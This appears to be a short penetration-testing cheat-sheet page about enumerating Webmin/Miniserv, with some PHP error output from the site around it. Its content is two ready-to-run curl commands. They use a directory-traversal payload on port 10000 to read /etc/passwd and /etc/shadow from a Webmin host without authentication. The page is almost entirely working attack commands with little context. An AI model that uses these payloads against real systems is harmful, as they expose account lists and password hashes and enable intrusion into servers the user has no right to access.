Warning: PHP Request Startup: Invalid date.timezone value '', using 'UTC' instead in Unknown on line 0

Warning: PHP Request Startup: Session ini settings cannot be changed after headers have already been sent in Unknown on line 0

Warning: session_start(): Session cannot be started after headers have already been sent in /home/admud64/mrleet.com/user/database_connection.php on line 5
miniserv_webmin_enumeration used and required in Penetration Testing ~ MrLeet

Title: miniserv_webmin_enumeration used and required in Penetration TestingAuthor: ajayverma
# Miniserv and webmin Enumeration

## Test for LFI & file disclosure vulnerability by grabbing /etc/passwd

```ShellSession
curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd
```

## Test to see if webmin is running as root by grabbing /etc/shadow

```ShellSession
curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/shadow
```


Submitted On: 2019-06-25 12:39:12




Warning: PHP Startup: Invalid date.timezone value '', using 'UTC' instead in Unknown on line 0